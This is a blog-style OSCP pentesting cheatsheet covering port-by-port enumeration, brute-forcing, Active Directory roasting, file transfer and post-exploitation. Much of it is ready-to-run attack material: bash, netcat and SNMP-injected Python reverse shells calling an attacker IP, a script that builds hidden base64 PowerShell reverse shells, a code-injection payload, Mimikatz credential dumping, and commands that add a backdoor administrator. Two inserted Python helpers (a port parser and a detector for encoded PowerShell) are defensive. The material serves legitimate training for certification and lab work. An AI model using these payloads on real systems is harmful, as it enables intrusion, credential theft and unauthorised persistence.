
# My OSCP Pentesting Cheatsheet


I had my OSCP exam on 14.03.2025, and on 17 March, three days later, I already received the confirmation that I had passed the OSCP exam! This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post you can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post-exploitation that can be useful for penetration testing and the OSCP exam.

## Some useful Tips

### .env file

I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an `.env` file in each of these directories and stored useful environment variables such as `$TARGET_IP` and `$TARGET_DOMAIN` in them:

```bash
export TARGET_IP="10.10.10.11"
export TARGET_DOMAIN="hackerask.com"
```

Then I could simply source the `.env` file whenever I wanted to work on this machine:

```bash
source .env
```

This is especially useful when you are working with multiple terminal tabs. You can also use this file to store other environment variables that you use frequently, such as credentials, or to run scripts, such as starting a terminal logger.

### $myip environment variable

I found it quite useful to have my IP address in a `$myip` environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the `tun0` network interface to see our local VPN IP address. We can look at it with `ifconfig tun0` or `ip addr show tun0`.
To avoid having to type in the IP address every time I need it, I created a `$myip` environment variable that looks like this:

```bash
export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1)
```

We can add the `export` line to our `.bashrc` or `.zshrc` and then source the file to be able to use the environment variable:

```
$ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"
/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1
```

This will output the reverse shell payload with our IP address of the `tun0` network interface.

### Copy Alias

I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy `copy` alias to pipe the output of a command into the clipboard. I decided to use `xclip`, which can be installed with `apt`:

```bash
sudo apt install xclip
```

To create the alias, we can add the following line to the `.bashrc` or `.zshrc` file:

```bash
alias copy='xclip -selection clipboard'
```

And then restart the terminal session or source the file to be able to use it. We can use the `copy` alias by appending it with a pipe:

```bash
echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy
```

This will pipe the output of the `echo` command, the reverse-shell payload, to our clipboard.

### Tmux

You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with easy keyboard shortcuts.
See: Tmux Cheat Sheet & Quick Reference

## Network Enumeration

### General

#### Host Discovery

```bash
nmap -sn 192.168.178.1-254 -vv -oA hosts
cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' '
```

If nmap does not work, we can also try to ping the hosts:

```bash
for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1 | grep "icmp_seq=1" | cut -f4 -d ' ' | tr ':' ' '; done
```

#### Port Scanning

My first step is usually to scan the machine quickly with nmap for open TCP ports:

```bash
sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt
```

Then I can use the following command to get all ports comma-separated as output:

```bash
cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /'
```

Then we can use the open ports to do a more detailed version scan:

```bash
nmap -p <ports> -sC -sV -oA enum/nmap/resource $TARGET_IP
```

After scanning the TCP ports, we should not forget to scan for UDP ports as well:

```bash
sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp
```

### TCP

#### 21 - FTP

Anonymous login:

```bash
ftp ftp://anonymous:anonymous@$TARGET_IP
```

Banner grabbing:

```bash
nc -vn $TARGET_IP 21
```

Download all files:

```bash
wget -m ftp://anonymous:anonymous@$TARGET_IP
wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/
```

Bruteforce:

```bash
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp
```

#### 22 - SSH

Nmap:

```bash
# Check authentication methods:
nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root"

# Retrieve version
nmap -p22 $TARGET_IP -sV
```

Bruteforce:

```bash
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh
```

#### 23 - Telnet

Banner grabbing:

```bash
nc -vn $TARGET_IP 23
```

Nmap enumeration:

```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 $TARGET_IP
```

The script `telnet-ntlm-info.nse` can obtain NTLM info.
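For the port-scanning workflow above (quick `-p-` scan, extract the open ports, rescan them with `-sC -sV`), here is an added Python helper that parses the normal-output file by port state instead of grepping for `/tcp`, so filtered ports and lines that merely mention a port never end up in the `-p` list. It is my own example, not the author's script; the scan output it parses is constructed.

```python
import re

# One row of nmap's port table in normal (-oN) output, e.g. "22/tcp open ssh syn-ack ttl 63".
# "open|filtered" is listed first so the alternation cannot stop early at "open".
PORT_ROW = re.compile(
    r"^(\d{1,5})/(tcp|udp)\s+(open\|filtered|open|closed|filtered|unfiltered)\b"
)


def open_ports(normal_output: str, proto: str = "tcp",
               include_open_filtered: bool = False) -> list[int]:
    """Return the sorted, de-duplicated open ports for one protocol.

    Only port-table rows are considered: lines that do not start with a port number
    (the "Not shown: ..." summary, verbose progress lines, headers) never match.
    """
    wanted = {"open", "open|filtered"} if include_open_filtered else {"open"}
    ports = set()
    for line in normal_output.splitlines():
        m = PORT_ROW.match(line)
        if m and m.group(2) == proto and m.group(3) in wanted:
            ports.add(int(m.group(1)))
    return sorted(ports)


def port_argument(ports: list[int]) -> str:
    """Format ports for nmap's -p switch, e.g. "22,80,445"."""
    return ",".join(str(p) for p in ports)


# Constructed sample in the shape of enum/nmap/quick-scan.txt (not a real scan result).
SAMPLE_QUICK_SCAN = """\
# Nmap 7.94 scan initiated ... as: nmap -p- -vvv 10.10.10.11 -oN enum/nmap/quick-scan.txt
Nmap scan report for 10.10.10.11
Host is up, received echo-reply ttl 63 (0.021s latency).
Discovered open port 22/tcp on 10.10.10.11
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE       REASON
22/tcp    open     ssh           syn-ack ttl 63
80/tcp    open     http          syn-ack ttl 63
445/tcp   open     microsoft-ds  syn-ack ttl 63
3389/tcp  filtered ms-wbt-server no-response
8080/tcp  open     http-proxy    syn-ack ttl 63
# Nmap done at ... -- 1 IP address (1 host up) scanned in 25.30 seconds
"""

if __name__ == "__main__":
    ports = open_ports(SAMPLE_QUICK_SCAN)
    print(f"nmap -p {port_argument(ports)} -sC -sV -oA enum/nmap/resource $TARGET_IP")
```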
#### 25,465,587 - SMTP

Banner grabbing:

```
$ rlwrap nc -vn $TARGET_IP 25
HELO
AUTH
```

Nmap:

```bash
nmap -p25 --script smtp* -v $TARGET_IP
# smtp-commands, smtp-enum-users, smtp-open-relay
```

Send emails:

```bash
sudo swaks -t <recipient@domain> --from <sender@domain> --server $TARGET_IP --header "Subject: TEXT" --body @body.txt --attach @file.pdf --suppress-data -ap
```

#### 53 - DNS

Try zone transfer:

```bash
dig axfr @$TARGET_IP
dig axfr @$TARGET_IP $TARGET_DOMAIN
```

Get more information:

```bash
dig ANY @$TARGET_IP $TARGET_DOMAIN
```

#### 79 - Finger

We can use `finger-user-enum.pl` to enumerate users:

```bash
perl ~/hacking/scripts/kali/finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t $TARGET_IP > finger_enum_log.txt
cat finger_enum_log.txt | grep -v "is not known" | grep "Login:" | cut -f3 -d ' '
```

#### 80,443 - HTTP

```bash
gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wfuzz/wordlist/general/megabeast.txt -o enum/web/80-gobuster.txt
gobuster dir -u "http://$TARGET_IP/" -w /usr/share/wordlists/dirb/big.txt -o enum/web/80-gobuster.txt
dirsearch -u http://$TARGET_IP -r -o enum/web/80-dirsearch.txt
feroxbuster --url http://$TARGET_IP
```

WordPress scanner:

```bash
wpscan --url http://$TARGET_IP -e ap,t,tt,u
# Enumerate: -e with ap: all plugins, t: popular themes, tt: timthumbs and u: user IDs in range 1-10
```

WebDAV client:

```bash
cadaver http://$TARGET_IP
```

Nikto web vulnerability scanning:

```bash
nikto -host=http://$TARGET_IP -output=enum/web/80-nikto.txt
```

API testing:

```
# This is an example from the PG machine Hetemit
# [Werkzeug httpd 1.0.1 (Python 3.6.8) Server]
$ curl -i http://192.168.143.117:50000/verify -X POST --data "code=asdf"
Internal Server Error
$ curl -i http://192.168.143.117:50000/verify -X POST --data "code=5*5"
25
$ curl -i http://192.168.143.117:50000/verify -X POST --data "code=__import__('os').popen('whoami').read()"
username
```

`/etc/hosts`:

```bash
echo "$TARGET_IP\t$TARGET_DOMAIN" | copy
```

IIS Shortnames: Some IIS servers are vulnerable to IIS tilde / shortname enumeration. IIS-ShortName-Scanner:

```bash
git clone git@github.com:irsdl/IIS-ShortName-Scanner.git
cd IIS-ShortName-Scanner/Docker/
docker build . -t shortname
docker run shortname 2 20 http://$TARGET_IP
```

Basic PHP webshell:

```bash
echo '<php webshell code>' > shell.php
```

#### 88 - Kerberos

Authentication: Not much to do here. You can just try bruteforcing:

```bash
nmap -Pn -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="$TARGET_DOMAIN",userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt $TARGET_IP
```

Try to get service tickets (username/password required):

```bash
sudo impacket-GetUserSPNs -request -dc-ip <dc-ip> <domain>/<user>
```

#### 110,995 - POP

Enumeration:

```bash
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110,995 $TARGET_IP

# Just execute all POP scripts
nmap --script pop* -sV -p 110,995 $TARGET_IP
```

Interacting with POP:

```
# Syntax of POP commands:
USER uid        Log in as "uid"
PASS password   Substitute "password" for your actual password
STAT            List number of messages, total mailbox size
LIST            List messages and sizes
RETR n          Show message n
DELE n          Mark message n for deletion
RSET            Undo any changes
QUIT            Logout (expunges messages if no RSET)
TOP msg n       Show first n lines of message number msg
CAPA            Get capabilities

# Command
$ rlwrap nc -vn $TARGET_IP 110
USER jonas
+OK
PASS password
+OK Welcome jonas
LIST
+OK 2 1807
1 786
2 1021
RETR 1
....
```
#### 135,593 - MSRPC

Nmap:

```bash
nmap --script msrpc-enum -p 135 $TARGET_IP
```

Rpcdump:

```bash
impacket-rpcdump -port 135 $TARGET_IP | grep -E 'MS-EFSRPC|MS-RPRN|MS-PAR'
```

- MS-EFSRPC: It might be vulnerable to PetitPotam.
- MS-RPRN, MS-PAR: It might be vulnerable to PrintNightmare (PoC).

RPC client:

```bash
# Anonymous logon:
rpcclient -N -U '' -p 135 $TARGET_IP
# -k: Kerberos authentication
rpcclient -k $TARGET_IP

# --- Commands ---
# Server info
rpcclient $> srvinfo
# Enumerate domains
rpcclient $> enumdomains
# Enumerate domain users
rpcclient $> enumdomusers
# Enumerate domain groups
rpcclient $> enumdomgroups
# Domain info
rpcclient $> querydominfo
# Current username
rpcclient $> getusername
```

If we have valid user credentials, we can connect with rpcclient and enumerate groups and users:

```bash
$ rpcclient -U '<domain>/<user>%<password>' $TARGET_IP
> enumdomgroups
> enumdomusers
> querygroupmem
> queryusergroups
# We can try to modify account information with setuserinfo
# The level parameter refers to the level of detail we want to modify in the user account data
# 0: Basic information, username, fullname
# 1: Additional information, home directory, script path, profile path
# 2: Further information, password age, privileges, logon script
# 3: Detailed information, including all above and group membership
# 4: Even more detailed, including all above and security identifier (SID)
# To change a password we can use setuserinfo2, with a level of 2,3.
> setuserinfo <user> 23 '<new password>'
```

#### 139,445 - SMB

Null session:

```bash
smbclient -N -L \\\\$TARGET_IP\\
nxc smb $TARGET_IP -u '' -p ''
nxc smb $TARGET_IP -u '' -p '' --shares
nxc smb $TARGET_IP -u '' -p '' --users
```

SMB login with "guest":

```bash
impacket-smbclient zeus/guest@$TARGET_IP
# or
smbmap -H $TARGET_IP -u guest -d $TARGET_DOMAIN
```

If we have credentials for a target but can only log in with SMB, we can try to execute a command with it:

```bash
nxc smb $TARGET_IP -u <user> -p <password> -X 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AY...AKAApAA=='
```

Enumerate shares:

```bash
smbclient "\\\\$TARGET_IP\\Share" -U 'domain\user' --password 'password' -c 'recurse;ls'
# or
smbmap -R -H $TARGET_IP
# Download a file
smbmap -R -H $TARGET_IP -A Groups.xml -q
# Bruteforce RID
nxc smb $TARGET_IP -u hazard -p stealth1agent --rid-brute
```

Group Policy Preferences (e.g. `Groups.xml`; e.g. HTB Querier - cached GPP file): If we find Group Policy Preferences (GPP) in a share, we can try to find credentials (often in XML files).
If we find an XML file with a `cpassword` attribute, we can decrypt it with `gpp-decrypt`:

```bash
gpp-decrypt '<cpassword>'
```

Overall enumeration:

```bash
enum4linux $TARGET_IP
nmap -p139,445 -sC -sV --script smb-vuln* $TARGET_IP
```

If valid credentials are found, you can try to add the user to the "Remote Access" group:

```bash
net rpc group addmem "Remote Access" "<user>" -U "<user>%<password>" -S $TARGET_IP
```

#### 143,993 - IMAP

Bruteforce logins:

```bash
hydra -L users.txt -P custom-wordlist.txt -f $TARGET_IP imap
```

Interacting with IMAP:

```bash
# List all messages in mailbox
curl -k "imap://$TARGET_IP/INBOX?ALL" --user name:password

# View email
curl -k "imap://$TARGET_IP/INBOX;UID=2" --user name:password
```

#### 389,636,3268,3269 - LDAP

We can try to search and access LDAP:

```bash
ldapsearch -H ldap://$TARGET_IP -x -b "DC=<domain>,DC=<tld>" > enum/ldap_dump.txt
nxc ldap $TARGET_IP -u '' -p '' -M get-desc-users
nxc ldap $TARGET_IP -u '' -p '' --password-not-required --admin-count --users --groups
```

Enumerate domain objects:

```bash
./windapsearch.py -d $TARGET_DOMAIN --dc-ip $TARGET_IP -U
# or
impacket-GetADUsers $TARGET_DOMAIN/ -dc-ip $TARGET_IP -debug
```

LAPS (Local Administrator Password Solution):

```bash
nxc ldap $TARGET_IP -d 'domain' -u 'username' -p 'password' --kdcHost $TARGET_IP -M laps
~/hacking/scripts/kali/pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" --dc-ip $TARGET_IP
ldapsearch -v -c -D fmcsorley@hutch.offsec -w CrabSharkJellyfish192 -b "DC=hutch,DC=offsec" -H ldap://$IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```

#### 1433 - MSSQL

Nmap enumeration:

```bash
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $TARGET_IP
```

If you have Windows credentials (e.g. from Kerberoasting), you have to use `-windows-auth`:

```
$ impacket-mssqlclient sql_svc:Dolphin1@$TARGET_IP -windows-auth

# How to execute commands:
enable_xp_cmdshell;
RECONFIGURE;
# or
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

# Execute commands:
xp_cmdshell whoami
xp_cmdshell 'powershell -e <base64>'
```

```bash
nxc mssql $TARGET_IP -u user.txt -p pass.txt
```

Once we have access to MSSQL, we can try to use `xp_dirtree` to make a request to a share and try to catch the request with Responder:

```
# SQL:
xp_dirtree \\$myip\share

# Responder
sudo responder -I tun0 --verbose
```

Useful MSSQL queries:

```sql
-- List databases
SELECT name FROM master..sysdatabases;

-- List tables:
SELECT name FROM msdb..sysobjects WHERE xtype = 'U';
```

#### 1978,9099 - Mouse Exploits

- Port 1978: (WiFi Mouse 1.7.8.5) - Exploit-DB: https://www.exploit-db.com/exploits/49601
- Port 9099: (Mobile Mouse 3.6.0.4) - Exploit-DB: https://www.exploit-db.com/exploits/51010

#### 3306 - MySQL

Connect to a MySQL database:

```bash
# It will ask for a password
mysql -u root -p
```

Useful MySQL commands:

```sql
show databases;
use <database>;
connect <database>;
show tables;
describe <table>;
show columns from <table>;
select version();
select @@version;
select user();
select database();

-- Get a shell with the mysql client user
\! sh

-- Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<table>"

-- Read & write
---- You need the FILE privilege to read & write files.
select load_file('/var/lib/mysql-files/key.txt'); -- Read file
select 1,2,"<php code>",4 into OUTFILE 'C:/xampp/htdocs/back.php' -- Write file

-- Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
```

#### 5432 - PostgreSQL

Remote connection:

```bash
psql -h <host> -p <port> -U <user> -W
```

```sql
-- List users
\du

-- Execute commands
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM '<command>';
SELECT * FROM cmd_exec;
```

#### 5800,5801,5900,5901 - VNC

Decrypt VNC passwords:

```bash
echo -n "6b,cf,2a,4b,6e,5a,ca,0f" | sed 's/,//g' | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
```

#### 6379 - Redis

Connect:

```bash
redis-cli -h $TARGET_IP
```

Commands:

```
# get all the info
config get *
# get the stored keys
keys *
# obtain the value of a key
get <key>
# when passwordless authentication is available we can write files with redis
# change the working directory
config set dir <path>
# name of the file you want to save
config set dbfilename test.php
# contents to be stored in test.php
# set keyName value
set dnoscp '<contents>'
# create the file test.php with the contents
save
# get all the stored keys
keys *
# get values from the key
dump <key>
# delete key
del <key>
```

### UDP

#### 123 - NTP

Synchronize watches:

```bash
sudo ntpdate $IP
```

Enumeration:

```bash
nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 $TARGET_IP
```

#### 161,162,10161,10162 - SNMP

Nmap:

```bash
sudo nmap -sU -p 161 --script snmp-* $TARGET_IP -oG enum/nmap/snmp.txt
# snmp-info - SNMP information
# snmp-brute - bruteforce valid credentials
```

Bruteforce community strings:

```bash
nmap -sU -p 161 --script snmp-brute $TARGET_IP --script-args snmp-brute.communitiesdb=/usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt
onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $TARGET_IP
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET_IP snmp
python3 ~/hacking/scripts/kali/scripts/snmpbrute.py -t $TARGET_IP -f /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
```

SNMP enumeration:

```bash
snmp-check -c <community> $TARGET_IP
```

Get useful information:

```bash
# Collect data
snmpbulkwalk -c public -v2c $TARGET_IP . | tee -a enum/bulk-snmp

# Display SNMP names based on how often they show up
grep -oP '::.*?\.' enum/bulk-snmp | sort | uniq -c | sort -n

# Check for running software and its parameters
grep hrSWRun enum/bulk-snmp | less
```

Reverse shell:

```bash
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
```

```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 $TARGET_IP 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"192.168.45.197\",5555));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
```

Trigger it:

```bash
snmpwalk -v 2c -c public $TARGET_IP nsExtendObjects
```

## Password Guessing

- Always try the product/manufacturer name as user/password
- If a name is found, try upper/lowercase, email etc.
- Always try name:name as password (uppercase/lowercase)
- John Doe becomes: john, John, johnd, jdoe, john.doe, j.doe, jd
- Use cewl to create a custom wordlist
- Use CUPP

For usernames we can use Username Anarchy to generate usernames:

```bash
./username-anarchy --input-file names.txt --select-format first,flast,first.last,firstl > users-generated.txt
```

## Reverse Shells

### Base64-encoded PowerShell Reverse Shell

On Windows targets, I often use a base64-encoded PowerShell reverse shell to gain initial access to a system.
To avoid having to manually edit and encode the reverse shell or use websites like revshells.com, I wrote this Python script to generate the encoded reverse shell with a single command:

```python
import sys
import base64

if len(sys.argv) < 2:
    print("usage:", sys.argv[0], "<ip> [<port>]")
    sys.exit(0)

ip = sys.argv[1]
port = "5555"
if len(sys.argv) == 3:
    port = sys.argv[2]

payload = '$client = New-Object System.Net.Sockets.TCPClient("'+ip+'",'+port+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# PowerShell's -EncodedCommand expects base64 of UTF-16LE text without a BOM,
# so encode explicitly as utf-16-le instead of relying on the platform byte order.
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16-le')).decode()
print(cmd)
```

We can then run the script to generate a base64-encoded PowerShell reverse shell:

```
$ python3 powershell_rev.py $myip 5555
powershell -nop -w hidden -e <base64-encoded payload>
```

### If the reverse shell is not working

If the common reverse shells are not working, you can try to use a named-pipe-based reverse shell:

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $myip 5555 >/tmp/f
```

Often this reverse shell is quite reliable and will start a shell. But if you still do not get a shell, you can try using common ports like 21, 22, 80, etc. (maybe a firewall is blocking connections from other ports).
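From the defender's side, the encoding used above is exactly what makes `-EncodedCommand` payloads easy to triage in process-creation logs: the argument is base64 of UTF-16LE text, so it decodes deterministically and can be checked for the generator's tell-tale calls. The following Python helper is an added example (not the author's script); the command line it inspects is constructed and the embedded stand-in contains only the indicator strings, not a working shell.

```python
import base64
import binascii
import re
from typing import Optional

# The encoded-command switch: -e, -ec, -enc, -encodedcommand or any prefix of
# -EncodedCommand, followed by a base64 blob.  "-ExecutionPolicy" does not match.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_WINDOW = re.compile(r"(?i)\s-w[a-z]*\s+hidden\b")

# Strings that characterise the TCPClient-based reverse shell built by the generator above.
INDICATORS = (
    "System.Net.Sockets.TCPClient",
    ".GetStream()",
    "iex ",
    "Invoke-Expression",
    "$stream.Write(",
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or not decodable.

    PowerShell expects base64-wrapped UTF-16LE text, so anything that is not valid
    base64 (strict alphabet and padding) or not even-length UTF-16 is treated as noise.
    """
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Summarise one process command line for triage."""
    script = decode_encoded_command(cmdline)
    hits = [i for i in INDICATORS if script and i.lower() in script.lower()]
    return {
        "encoded": script is not None,
        "hidden_window": bool(HIDDEN_WINDOW.search(cmdline)),
        "indicators": hits,
        "script": script,
    }


# Constructed sample: a stand-in holding the generator's tell-tale calls, encoded the way
# the script above does it (UTF-16LE without BOM).  It is not a functioning shell.
SAMPLE_SCRIPT = ('$client = New-Object System.Net.Sockets.TCPClient("10.0.0.5",5555);'
                 '$stream = $client.GetStream();iex $data')
SAMPLE_CMDLINE = "powershell -nop -w hidden -e " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, "powershell -ExecutionPolicy Bypass -File backup.ps1"):
        print(analyze(line))
```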
## Active Directory and Windows Post-Exploitation

### Mimikatz

```powershell
curl.exe -o mimikatz_trunk.zip http://$LOCAL_IP/mimikatz_trunk.zip
Expand-Archive -LiteralPath mimikatz_trunk.zip
.\mimikatz_trunk\x64\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::msv" "lsadump::sam" "exit"
```

### Ligolo

On the Kali machine, I started the proxy:

```bash
sudo ./ligolo-proxy -selfcert
```

Then we can start the ligolo-agent on the target machine:

```bash
./ligolo-agent -connect 192.168.178.10:11601 -ignore-cert
```

Then in the ligolo-proxy shell I entered the following commands:

```
interface_create --name "oscp"
session
tunnel_start --tun oscp
ifconfig
interface_add_route --name oscp --route 10.10.10.0/24
```

Now we can use another terminal tab and access the 10.10.10.0/24 internal network.

Reverse shell listener in ligolo:

```
listener_add --addr 0.0.0.0:5656 --to 127.0.0.1:4444 --tcp
```

Transfer files with the following listener:

```
listener_add --addr 0.0.0.0:2222 --to 127.0.0.1:8888 --tcp
```

### Kerberoasting

(User must have: `DONT_REQUIRE_PREAUTH`)

```bash
sudo impacket-GetUserSPNs -request -dc-ip $TARGET_IP $TARGET_DOMAIN/
```

Try it without a password with a list of usernames:

```bash
impacket-GetUserSPNs $TARGET_DOMAIN/ -usersfile users.txt --no-pass -outputfile kerberoast.hash -dc-ip $TARGET_IP
```

Crack the hashes:

```bash
sudo hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force
```

### AS-REP Roasting

```bash
impacket-GetNPUsers -dc-ip $TARGET_IP -request $TARGET_DOMAIN/
```

Try it without a password with a list of usernames:

```bash
impacket-GetNPUsers $TARGET_DOMAIN/ -usersfile users.txt --no-pass -outputfile asreproast.hash -dc-ip $TARGET_IP
```

Crack the hashes:

```bash
sudo hashcat -m 18200 asreproast.hash /usr/share/wordlists/rockyou.txt --force
```

### Transfer Files

Typical ways I use:

```bash
curl http://$LOCAL_IP/file.exe -o file.exe
wget http://$LOCAL_IP/file.exe -O file.exe
```

If wget and curl do not work:

```powershell
iwr -Uri "http://$LOCAL_IP/file.exe" -OutFile file.exe
certutil -urlcache -f http://$LOCAL_IP/file.exe file.exe
certutil -urlcache -split -f http://$LOCAL_IP/file.exe file.exe
```

Netcat upload/download file:

```bash
# Listener
nc -q 0 -lvp 443 > file
# Send file
nc -nv IP_ADDR 443 < file
```

SMB server:

```
# SMB server
impacket-smbserver share ~/Downloads/smb -smb2support -username smb -password pass
net use \\$LOCAL_IP\share /u:smb pass
copy file.txt \\$LOCAL_IP\share\
net use /d \\$LOCAL_IP\share
```

### Add User and Permissions

Add admin user (with RDP and WinRM permissions):

```
net user attacker attacker /add
net localgroup Administrators attacker /add
```

Add RDP permissions with `nxc`:

```bash
netexec smb $TARGET_IP -u administrator -p pass123 -M rdp -o ACTION=enable
```

Add WinRM permissions:

```
net localgroup "Remote Management Users" attacker /add
```

Add RDP permissions:

```
net localgroup "Remote Desktop Users" attacker /add
```

Set the execution policy on the machine to Bypass:

```powershell
Set-ExecutionPolicy Bypass -Scope LocalMachine
```

## Resources

Collections of useful information:

Useful Tools:

Useful Proving Grounds and HackTheBox machine lists: